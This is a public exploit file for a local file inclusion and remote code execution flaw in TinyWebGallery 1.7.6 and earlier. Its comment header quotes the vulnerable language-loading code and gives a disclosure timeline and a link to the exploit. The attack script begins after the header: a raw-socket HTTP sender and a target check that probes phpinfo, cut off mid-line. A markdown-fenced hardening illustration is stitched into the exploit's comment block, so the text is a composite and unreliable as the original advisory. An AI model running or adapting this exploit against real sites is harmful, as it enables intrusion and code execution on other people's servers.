
TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit
http://www.travesti.in 
details..: this vulnerability derives from QuiXplorer (http://quixplorer.sourceforge.net/) 
exp link.: http://www.travesti.in/ex.txt 

	This PoC was written for educational purposes. Use it at your own risk.
	The author will not be responsible for any damage.

	[-] vulnerable code in /admin/_include/init.php

	110.	// Get Language
	111.	if (isset($GLOBALS['__GET']["lang"]))  $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__GET']["lang"];
	112.	elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] =  $GLOBALS['__POST']["lang"];
	113.	else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"];  
	114.	else $GLOBALS["language"] = $GLOBALS["default_language"];
	115.
			[...]
	138.
	139.	// ------------------------------------------------------------------------------
	140.	// Necessary files
	141.	require _QUIXPLORER_PATH . "/_config/conf.php";
	142.
	143.	if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
	144.	    require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
	145.	else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
	146.	    require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
	147.	else
	148.	    require _QUIXPLORER_PATH . "/_lang/en.php";

	An attacker can include arbitrary local files through the require at line 144, because the
	$_GET['lang'] parameter is not properly sanitised before it is concatenated into the file path.
	Successful exploitation requires magic_quotes_gpc = off.
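	The root cause is that a request-controlled string reaches require with nothing more than a
	file_exists() check in front of it. The following is an added illustration, not code from
	TinyWebGallery or QuiXplorer: it places the unsafe pattern from init.php beside a language
	loader that resolves the request value against an allowlist built from the files that actually
	ship in the language directory. APP_PATH, LANG_DIR and the function names are assumptions
	standing in for _QUIXPLORER_PATH and the original inline logic.

```php
<?php
// Added illustration (not TinyWebGallery or QuiXplorer code): the unsafe
// pattern from init.php beside a hardened language loader.

// Hypothetical base path and language directory, standing in for _QUIXPLORER_PATH.
define('APP_PATH', __DIR__);
define('LANG_DIR', APP_PATH . '/_lang');

// Unsafe: the request value is concatenated straight into the path, so any
// readable file the attacker can name with traversal sequences gets included.
function load_language_unsafe(string $lang): void
{
    $file = LANG_DIR . '/' . $lang . '.php';
    if (file_exists($file)) {
        require $file;
    }
}

// Allowlist derived from the shipped language files, never from the request.
function available_languages(): array
{
    $codes = [];
    foreach (glob(LANG_DIR . '/*.php') ?: [] as $path) {
        $codes[] = basename($path, '.php');
    }
    return $codes;
}

// Pick a language code: shape check first, then membership in the allowlist,
// falling back to the default on any mismatch.
function select_language(?string $requested, string $default = 'en'): string
{
    // ISO-style codes only, e.g. "en", "de", "pt_BR"; no slashes, dots or NULs.
    if ($requested === null || !preg_match('/^[a-z]{2}(_[A-Z]{2})?$/', $requested)) {
        return $default;
    }
    return in_array($requested, available_languages(), true) ? $requested : $default;
}

// Hardened loader: include only an allowlisted code, and confirm as defence in
// depth that the resolved path still lives inside LANG_DIR.
function load_language_safe(?string $requested): string
{
    $lang = select_language($requested);
    $base = realpath(LANG_DIR);
    $real = realpath(LANG_DIR . '/' . $lang . '.php');
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('language file outside expected directory');
    }
    require $real;
    return $lang;
}

// Usage: the untrusted value is read once and passed explicitly, mirroring the
// GET / POST / session precedence of the original code.
$lang = load_language_safe($_GET['lang'] ?? $_POST['lang'] ?? $_SESSION['admin_lang'] ?? null);
```

	The shape check alone already rejects traversal and the null byte that the magic_quotes_gpc
	requirement hints at; the allowlist and realpath() checks are there so that a later change to
	the pattern, or a misplaced file inside _lang, still cannot turn the include into a file read.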

	[-] Disclosure timeline:
	[14/04/2009] - Bug discovered
	[25/04/2009] - Vendor contacted
	[26/04/2009] - Vendor replied
	[26/04/2009] - Fix released: http://www.tinywebgallery.com/forum/viewtopic.php?t=1653 
	[08/05/2009] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// Send a raw HTTP request to $host on port 80 and return the full response.
function http_send($host, $packet)
{
	if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
	  die("\nsocket_create(): " . socket_strerror(socket_last_error()) . "\n");

	if (socket_connect($s, $host, 80) == false)
	  die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");

	socket_write($s, $packet, strlen($packet));
	$response = "";
	while ($m = socket_read($s, 2048)) $response .= $m;

	socket_close($s);
	return $response;
}

function check_target()
{
	global $host, $path;

	$packet  = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n";
	$packet .= "Host: {$host}\r\n";
	$packet .= "Connection: close\r\n\r\n";

	preg_match('/magic_quotes_gpc<\/td>(.*)<\/td>
